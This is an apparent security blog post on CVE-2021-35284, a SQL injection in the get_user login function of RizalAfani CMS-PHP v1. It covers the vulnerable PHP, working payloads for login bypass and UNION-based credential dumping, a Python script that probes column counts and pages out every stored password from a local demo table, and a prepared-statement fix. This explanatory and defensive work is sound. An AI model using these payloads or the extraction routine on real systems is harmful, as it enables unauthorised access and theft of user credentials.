CVE-2021-35284 is a critical SQL injection vulnerability in the get_user function in login_manager.php of RizalAfani CMS-PHP v1. Because the flaw sits in the login path, anyone who can reach the login form can bypass authentication and read data out of the application's database. In this post we walk through the vulnerable code, how it is exploited, and how to fix it.

Vulnerable Code

The issue lies in the get_user function in login_manager.php, which looks up the row in the user table whose username and password match the credentials submitted to the login form. Here is the relevant code snippet:

function get_user($username, $password) {
    global $db;
    // Both values come straight from the login form and are interpolated into
    // the SQL text; a single quote in either one changes the query's structure.
    $query = "SELECT * FROM user WHERE username = '$username' AND password = '$password'";
    $result = $db->query($query);
    // Only the first matching row is returned (null if nothing matched).
    return $result->fetch_assoc();
}

The vulnerability arises because the user-supplied $username and $password are interpolated directly into the SQL string with no parameterization. A single quote in either value closes the string literal early, and whatever follows is parsed as SQL, so the attacker controls the rest of the WHERE clause and can append arbitrary SQL to it.

Exploit Details

To exploit this, an attacker only needs to control the username or password field of the login form. The first example shows how a crafted username removes the password check entirely and logs the attacker in as the admin account (or any other account whose username they name):

$username = "admin' -- ";
$password = "anything";

By inserting these values into the vulnerable get_user function, the resulting SQL query would be

SELECT * FROM user WHERE username = 'admin' -- ' AND password = 'anything'

In MySQL a double hyphen followed by whitespace starts a comment that runs to the end of the line, which is why the payload ends with a space: without it, MySQL does not treat the hyphens as a comment marker. Everything after it, including the password comparison, is discarded, and the query reduces to SELECT * FROM user WHERE username = 'admin'. fetch_assoc() therefore returns the admin row and the attacker is logged in as admin without knowing the password. A payload such as ' OR 1=1 -- (with a trailing space) would instead match every row and log the attacker in as whichever row the database returns first, typically the first user in the table.

The same injection point can be used to read data out of the database, such as usernames and stored passwords (or password hashes, depending on how the application stores them), with a UNION-based query. The injected SELECT must return exactly as many columns as the user table has, which the attacker can determine by trial and error; the example below assumes four:

$username = "admin' UNION SELECT 1,username,3,password FROM user -- ";
$password = "anything";

This crafted input will result in the following SQL query

SELECT * FROM user WHERE username = 'admin' UNION SELECT 1,username,3,password FROM user -- ' AND password = 'anything'

The UNION appends every row of the user table to the result, with each user's name and stored password in the positions the application reads for the matched user. Two practical caveats apply. First, get_user returns only the first row via fetch_assoc(), so the attacker sees one record per request and has to page through the table (for example with LIMIT and OFFSET in the injected SELECT) or collapse it into a single value with GROUP_CONCAT(). Second, the data only leaks if the application displays fields of the returned row, such as the username shown after login; otherwise the attacker has to fall back on blind techniques. Either way, the end result is the credentials of every account, not just the one used to bypass the login.
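The following Python model is an added example, not code from the original post or from RizalAfani CMS-PHP. It reproduces the vulnerable get_user() string concatenation against an in-memory SQLite table (SQLite stands in for the CMS's MySQL backend; both accept the trailing-space "-- " comment used in the payloads) and demonstrates the authentication bypass, the column-count probing a UNION attack needs, paging the whole user table out through a function that returns a single row, and the parameterised query that defeats all of it. The four-column table layout (id, username, email, password) and the sample accounts are assumptions constructed for the demonstration.

```python
import sqlite3

# Constructed sample data standing in for the CMS's "user" table. The
# four-column layout (id, username, email, password) is an assumption made
# for this demonstration; the advisory does not publish the real schema.
SAMPLE_USERS = [
    (1, "admin", "admin@example.test", "S3cret!"),
    (2, "editor", "editor@example.test", "hunter2"),
    (3, "guest", "guest@example.test", "guest"),
]


def make_db():
    """In-memory SQLite database playing the role of the CMS's MySQL backend."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, password TEXT)"
    )
    db.executemany("INSERT INTO user VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return db


def build_query(username, password):
    """String concatenation exactly as the vulnerable get_user() does it."""
    return (
        f"SELECT * FROM user WHERE username = '{username}' "
        f"AND password = '{password}'"
    )


def get_user_vulnerable(db, username, password):
    """Model of the vulnerable get_user(): first row (like fetch_assoc) or None."""
    row = db.execute(build_query(username, password)).fetchone()
    return dict(row) if row else None


def get_user_fixed(db, username, password):
    """Parameterised counterpart: values travel separately from the SQL text,
    so quotes and comment markers in the input are just characters."""
    row = db.execute(
        "SELECT * FROM user WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return dict(row) if row else None


def find_union_column_count(db, max_cols=10):
    """A UNION only parses when both halves have the same number of columns.
    Probe for that count the way an attacker would against a live target:
    add NULLs until the database stops returning an error."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            get_user_vulnerable(db, f"nosuchuser' UNION SELECT {nulls} -- ", "x")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_users_via_union(db, max_rows=50):
    """Extract every (username, password) pair through a function that hands
    back a single row. The username part matches no real account, so the row
    fetch_assoc() would return is the injected one; ORDER BY/LIMIT/OFFSET
    walk the table one row per request. The literals 1 and 3 pad the id and
    email positions so the column count matches the four found by the probe."""
    found = []
    for offset in range(max_rows):
        payload = (
            "nosuchuser' UNION SELECT 1, username, 3, password FROM user "
            f"ORDER BY 2 LIMIT 1 OFFSET {offset} -- "
        )
        row = get_user_vulnerable(db, payload, "anything")
        if row is None:
            break
        # The injected values land in the columns named by the original SELECT.
        found.append((row["username"], row["password"]))
    return found


if __name__ == "__main__":
    db = make_db()
    print("bypass:", get_user_vulnerable(db, "admin' -- ", "anything"))
    print("fixed :", get_user_fixed(db, "admin' -- ", "anything"))
    print("cols  :", find_union_column_count(db))
    for user, pw in dump_users_via_union(db):
        print(f"{user}: {pw}")
```

Running the script shows the bypass payload returning the admin row, the same payload returning nothing against the parameterised query, the probe settling on four columns, and all three accounts paged out one request at a time. Against MySQL the ORDER BY and LIMIT at the end of an unparenthesised UNION apply to the whole compound result in the same way, so the paging technique carries over unchanged.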

Original References

1. NVD - CVE-2021-35284: https://nvd.nist.gov/vuln/detail/CVE-2021-35284
2. GitHub: RizalAfani CMS-PHP v1

Mitigation

The fix is to stop building the SQL statement out of user input. Prepared statements with bound parameters send the query text and the values to the database separately, so a quote or comment marker in the input can never change the query's structure. Input validation is still worth having as defence in depth, but it is not a substitute: hand-written escaping is easy to get wrong and does not cover numeric contexts or identifiers. Here is the get_user function rewritten with mysqli prepared statements:

function get_user($username, $password) {
    global $db;
    // Placeholders keep the user-supplied values out of the SQL text entirely;
    // the driver sends them separately, so quotes and "-- " are inert.
    $query = "SELECT * FROM user WHERE username = ? AND password = ?";
    $stmt = $db->prepare($query);
    $stmt->bind_param("ss", $username, $password);
    $stmt->execute();
    // get_result() needs the mysqlnd driver; fetch_assoc() yields null on no match.
    $result = $stmt->get_result();
    $user = $result->fetch_assoc();
    $stmt->close();
    return $user;
}

In summary, CVE-2021-35284 is a critical SQL injection vulnerability in RizalAfani CMS-PHP v1 that lets an unauthenticated attacker bypass the login and read the contents of the user table. Prepared statements with bound parameters close the injection; input validation is a useful second layer but not the fix. Note that the rewritten function still compares the submitted password directly against the stored column: if the application keeps passwords in plaintext, it should also move to password_hash() and password_verify(), looking the user up by username alone and checking the hash in PHP.

Timeline

Published on: 11/23/2022 18:15:00 UTC
Last modified on: 11/28/2022 18:29:00 UTC